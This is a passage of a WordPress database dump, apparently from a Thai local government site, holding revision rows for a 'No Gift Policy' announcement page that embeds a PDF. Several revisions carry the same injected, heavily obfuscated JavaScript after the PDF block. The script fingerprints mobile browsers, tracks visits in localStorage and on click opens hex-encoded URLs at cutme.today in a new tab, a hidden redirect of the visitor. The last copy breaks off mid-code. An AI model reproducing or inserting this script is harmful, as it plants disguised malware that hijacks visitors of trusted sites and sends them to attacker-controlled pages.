จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:24:49','2025-06-09 06:24:49','',859,'http://pakhaeng.ssk.in.th/?p=1296',0,'revision','',0),
(1297,1,'2025-06-09 13:25:12','2025-06-09 06:25:12','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:25:12','2025-06-09 06:25:12','',859,'http://pakhaeng.ssk.in.th/?p=1297',0,'revision','',0),
(1298,1,'2025-06-09 13:34:47','2025-06-09 06:34:47','','Is It a Gift Instagram Post112','','inherit','','closed','','is-it-a-gift-instagram-post112','','','2025-06-09 13:34:47','2025-06-09 06:34:47','',859,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/Is-It-a-Gift-Instagram-Post112.png',0,'attachment','image/png',0),
(1299,1,'2025-06-09 13:35:02','2025-06-09 06:35:02','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:35:02','2025-06-09 06:35:02','',859,'http://pakhaeng.ssk.in.th/?p=1299',0,'revision','',0),
(1300,1,'2025-06-09 13:35:18','2025-06-09 06:35:18','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 